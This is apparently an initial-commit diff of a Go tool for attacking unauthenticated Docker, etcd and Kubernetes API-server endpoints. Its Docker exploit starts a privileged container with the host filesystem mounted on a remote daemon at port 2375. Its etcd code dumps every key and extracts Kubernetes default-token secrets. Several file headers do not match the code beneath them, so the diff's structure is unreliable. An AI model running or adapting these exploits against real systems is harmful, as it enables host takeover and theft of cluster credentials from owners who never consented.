Initial commit

Author: cdxiaodong

clod_unauthorized_tool.exe

@@ -0,0 +1,74 @@
+module clod_Unauthorized_tool
+
+go 1.23.1
+
+replace github.com/go-gl/gl => github.com/go-gl/gl v0.0.0-20211210172815-726fda9656d6
+
+require go.etcd.io/etcd/client/v3 v3.5.16
+
+require (
+	fyne.io/fyne/v2 v2.5.2 // indirect
+	fyne.io/systray v1.11.0 // indirect
+	github.com/BurntSushi/toml v1.4.0 // indirect
+	github.com/akavel/rsrc v0.10.2 // indirect
+	github.com/coreos/etcd v3.3.27+incompatible // indirect
+	github.com/coreos/go-semver v0.3.0 // indirect
+	github.com/coreos/go-systemd v0.0.0-20191104093116-d3cd4ed1dbcf // indirect
+	github.com/coreos/go-systemd/v22 v22.3.2 // indirect
+	github.com/coreos/pkg v0.0.0-20240122114842-bbd7aa9bf6fb // indirect
+	github.com/cpuguy83/go-md2man/v2 v2.0.1 // indirect
+	github.com/davecgh/go-spew v1.1.1 // indirect
+	github.com/fogleman/gg v1.3.0 // indirect
+	github.com/fredbi/uri v1.1.0 // indirect
+	github.com/fsnotify/fsnotify v1.7.0 // indirect
+	github.com/fyne-io/gl-js v0.0.0-20220119005834-d2da28d9ccfe // indirect
+	github.com/fyne-io/glfw-js v0.0.0-20240101223322-6e1efdc71b7a // indirect
+	github.com/fyne-io/image v0.0.0-20220602074514-4956b0afb3d2 // indirect
+	github.com/go-gl/gl v0.0.0-20211210172815-726fda9656d6 // indirect
+	github.com/go-gl/glfw/v3.3/glfw v0.0.0-20240506104042-037f3cc74f2a // indirect
+	github.com/go-ole/go-ole v1.2.6 // indirect
+	github.com/go-text/render v0.2.0 // indirect
+	github.com/go-text/typesetting v0.2.0 // indirect
+	github.com/godbus/dbus/v5 v5.1.0 // indirect
+	github.com/gogo/protobuf v1.3.2 // indirect
+	github.com/golang/freetype v0.0.0-20170609003504-e2365dfdc4a0 // indirect
+	github.com/golang/protobuf v1.5.4 // indirect
+	github.com/google/uuid v1.3.1 // indirect
+	github.com/gopherjs/gopherjs v1.17.2 // indirect
+	github.com/jackmordaunt/icns/v2 v2.2.6 // indirect
+	github.com/jeandeaual/go-locale v0.0.0-20240223122105-ce5225dcaa49 // indirect
+	github.com/josephspurrier/goversioninfo v1.4.0 // indirect
+	github.com/jsummers/gobmp v0.0.0-20151104160322-e2ba15ffa76e // indirect
+	github.com/lucor/goinfo v0.9.0 // indirect
+	github.com/mcuadros/go-version v0.0.0-20190830083331-035f6764e8d2 // indirect
+	github.com/nfnt/resize v0.0.0-20180221191011-83c6a9932646 // indirect
+	github.com/nicksnyder/go-i18n/v2 v2.4.0 // indirect
+	github.com/pmezard/go-difflib v1.0.0 // indirect
+	github.com/russross/blackfriday/v2 v2.1.0 // indirect
+	github.com/rymdport/portal v0.2.6 // indirect
+	github.com/srwiley/oksvg v0.0.0-20221011165216-be6e8873101c // indirect
+	github.com/srwiley/rasterx v0.0.0-20220730225603-2ab79fcdd4ef // indirect
+	github.com/stretchr/testify v1.9.0 // indirect
+	github.com/urfave/cli/v2 v2.4.0 // indirect
+	github.com/yuin/goldmark v1.7.1 // indirect
+	go.etcd.io/etcd/api/v3 v3.5.16 // indirect
+	go.etcd.io/etcd/client/pkg/v3 v3.5.16 // indirect
+	go.uber.org/atomic v1.7.0 // indirect
+	go.uber.org/multierr v1.6.0 // indirect
+	go.uber.org/zap v1.17.0 // indirect
+	golang.org/x/image v0.18.0 // indirect
+	golang.org/x/mobile v0.0.0-20231127183840-76ac6878050a // indirect
+	golang.org/x/mod v0.17.0 // indirect
+	golang.org/x/net v0.25.0 // indirect
+	golang.org/x/sync v0.7.0 // indirect
+	golang.org/x/sys v0.20.0 // indirect
+	golang.org/x/text v0.16.0 // indirect
+	golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d // indirect
+	golang.org/x/tools/go/vcs v0.1.0-deprecated // indirect
+	google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d // indirect
+	google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d // indirect
+	google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d // indirect
+	google.golang.org/grpc v1.59.0 // indirect
+	google.golang.org/protobuf v1.33.0 // indirect
+	gopkg.in/yaml.v3 v3.0.1 // indirect
+)

go.mod

@@ -0,0 +1,39 @@
+package docker
+
+import (
+	"fmt"
+	"net/http"
+	"strings"
+	"io"
+)
+
+func Check(target string) bool {
+	removeProto := strings.Replace(target, "http://", "", -1)
+	removeProto = strings.Replace(removeProto, "https://", "", -1)
+	removeProto = strings.Replace(removeProto, "/version", "", -1)
+	removeProto = strings.Replace(removeProto, ":2375", "", -1)
+
+	url := fmt.Sprintf("http://%s:2375/version", removeProto)
+
+	resp, err := http.Get(url)
+	if err != nil {
+		fmt.Printf("Error checking %s: %v\n", url, err)
+		return false
+	}
+	defer resp.Body.Close()
+
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		fmt.Printf("Error reading response from %s: %v\n", url, err)
+		return false
+	}
+
+	responseText := string(body)
+	if strings.Contains(responseText, "Docker Engine") || strings.Contains(responseText, "GoVersion") || strings.Contains(responseText, "BuildTime") {
+		fmt.Printf("[+] Potential -> %s\n", url)
+		return true
+	} else {
+		fmt.Printf("[-] No vulnerability detected -> %s\n", url)
+		return false
+	}
+}

go.sum

@@ -0,0 +1,30 @@
+package docker
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+)
+
+func Exploit(target string) {
+	removeProto := strings.Replace(target, "http://", "", -1)
+	removeProto = strings.Replace(removeProto, "https://", "", -1)
+	removeProto = strings.Replace(removeProto, "www.", "", -1)
+	removeProto = strings.Replace(removeProto, "/version", "", -1)
+	removeProto = strings.Replace(removeProto, ":2375", "", -1)
+
+	command := fmt.Sprintf("docker -H %s:2375 run --rm -it --privileged --net=host -v /:/mnt alpine /bin/sh -c 'id'", removeProto)
+	output, err := exec.Command("sh", "-c", command).Output()
+	if err != nil {
+		fmt.Printf("Error executing command: %v\n", err)
+		return
+	}
+
+	if strings.Contains(string(output), "root") {
+		msg := fmt.Sprintf("[+] exploited -> %s | %s", removeProto, string(output))
+		fmt.Println(msg)
+	} else {
+		msg := fmt.Sprintf("[-] failed -> %s | you can make sure by manual", removeProto)
+		fmt.Println(msg)
+	}
+}

internal/docker/Check.go

@@ -0,0 +1,106 @@
+package etcd
+
+import (
+	"context"
+	"fmt"
+	"log"
+	"net/http"
+	"regexp"
+	"strings"
+	"time"
+
+	"go.etcd.io/etcd/client/v3"
+)
+
+func EtcdGetToken(ip string, port int) bool {
+	cfg := clientv3.Config{
+		Endpoints:   []string{fmt.Sprintf("http://%s:%d", ip, port)},
+		DialTimeout: 5 * time.Second,
+	}
+
+	client, err := clientv3.New(cfg)
+	if err != nil {
+		log.Printf("etcd:%s:%d连接失败: %v", ip, port, err)
+		return false
+	}
+	defer client.Close()
+
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	resp, err := client.Get(ctx, "", clientv3.WithPrefix())
+	if err != nil {
+		log.Printf("etcd攻击失败: %v", err)
+		return false
+	}
+
+	for _, kv := range resp.Kvs {
+		if kv.Value != nil {
+			log.Println("etcd存在未授权访问")
+			log.Println(string(kv.Value))
+			if strings.Contains(string(kv.Value), "default-token") {
+				re := regexp.MustCompile(`default-token-\w{1,5}`)
+				tokens := re.FindAllString(string(kv.Value), -1)
+				if len(tokens) > 0 {
+					token := tokens[0]
+					log.Printf("发现token: %s", token)
+					log.Println("尝试获取对应的/registry/secrets/default/token信息")
+					tokenResp, err := client.Get(ctx, fmt.Sprintf("/registry/secrets/default/%s", token))
+					if err != nil {
+						log.Printf("获取token信息失败: %v", err)
+						continue
+					}
+					log.Printf("对应的/registry/secrets/default/token信息数据为: %v", tokenResp.Kvs)
+				}
+			}
+		}
+	}
+
+	return true
+}
+
+func Check(targetURL string) bool {
+	if !strings.HasPrefix(targetURL, "http") {
+		targetURL = "http://" + targetURL
+	}
+
+	versionURL := fmt.Sprintf("%s/version", targetURL)
+	log.Println(versionURL)
+
+	resp, err := http.Get(versionURL)
+	if err != nil {
+		log.Printf("地址访问失败: %v", err)
+		return false
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode == http.StatusOK {
+		log.Println("etcd地址存在/version接口，可以继续执行")
+		parts := strings.Split(targetURL, ":")
+		etcdIP := parts[1][2:] // Remove "//"
+		etcdPort := 2379
+		if len(parts) > 2 {
+			etcdPort = parsePort(parts[2])
+		}
+		log.Printf("etcd_ip为: %s", etcdIP)
+		log.Printf("etcd_port: %d", etcdPort)
+
+		etcdAttackStatus := EtcdGetToken(etcdIP, etcdPort)
+		if etcdAttackStatus {
+			log.Printf("%s存在未授权访问攻击", targetURL)
+			return true
+		} else {
+			log.Printf("%s不存在未授权访问攻击", targetURL)
+			return false
+		}
+	} else {
+		log.Printf("输入的地址不存在/version接口，结束任务")
+		return false
+	}
+}
+
+func parsePort(portStr string) int {
+	var port int
+	fmt.Sscanf(portStr, "%d", &port)
+	return port
+}

internal/docker/Exploit.go

@@ -0,0 +1,66 @@
+package etcd
+
+import (
+    "context"
+    "fmt"
+    "log"
+    "time"
+    "regexp"
+    "bytes"
+    "strings"
+
+    "go.etcd.io/etcd/client/v3"
+)
+
+// Exploit 利用etcd的未授权访问漏洞
+func Exploit(targetURL string) bool {
+    if !strings.HasPrefix(targetURL, "http") {
+        targetURL = "http://" + targetURL
+    }
+    parts := strings.Split(targetURL, ":")
+    ip := parts[1][2:] // Remove "//"
+    cfg := clientv3.Config{
+        Endpoints:   []string{fmt.Sprintf("http://%s:%d", ip, "2379")},
+        DialTimeout: 5 * time.Second,
+    }
+
+    client, err := clientv3.New(cfg)
+    if err != nil {
+        log.Printf("etcd:%s:%d连接失败: %v", ip, "2379", err)
+        return false
+    }
+    defer client.Close()
+
+    ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+    defer cancel()
+
+    resp, err := client.Get(ctx, "", clientv3.WithPrefix())
+    if err != nil {
+        log.Printf("etcd攻击失败: %v", err)
+        return false
+    }
+
+    for _, kv := range resp.Kvs {
+        if kv.Value != nil {
+            log.Println("etcd存在未授权访问")
+            log.Println(string(kv.Value))
+            if bytes.Contains(kv.Value, []byte("default-token")) {
+                re := regexp.MustCompile(`default-token-\w{1,5}`)
+                tokens := re.FindAll(kv.Value, -1)
+                if len(tokens) > 0 {
+                    token := string(tokens[0])
+                    log.Printf("发现token: %s", token)
+                    log.Println("尝试获取对应的/registry/secrets/default/token信息")
+                    tokenResp, err := client.Get(ctx, fmt.Sprintf("/registry/secrets/default/%s", token))
+                    if err != nil {
+                        log.Printf("获取token信息失败: %v", err)
+                        continue
+                    }
+                    log.Printf("对应的/registry/secrets/default/token信息数据为: %v", tokenResp.Kvs)
+                }
+            }
+        }
+    }
+
+    return true
+}

internal/etcd/Check.go

@@ -0,0 +1,35 @@
+package k8sapiserver
+
+import (
+    "fmt"
+    "io"
+    "log"
+    "net/http"
+    "strings"
+)
+
+func Check(apiaddr string) bool {
+    apiURL := fmt.Sprintf("%s/api", apiaddr)
+    log.Println(apiURL)
+
+    resp, err := http.Get(apiURL)
+    if err != nil {
+        log.Printf("地址访问失败: %v", err)
+        return false
+    }
+    defer resp.Body.Close()
+
+    body, err := io.ReadAll(resp.Body)
+    if err != nil {
+        log.Printf("读取响应失败: %v", err)
+        return false
+    }
+
+    if strings.Contains(string(body), "/api") {
+        log.Println("congrats, api-server request success.")
+        return true
+    } else {
+        log.Println("完成apiserver请求，但是没有权限访问apiserver")
+        return false
+    }
+}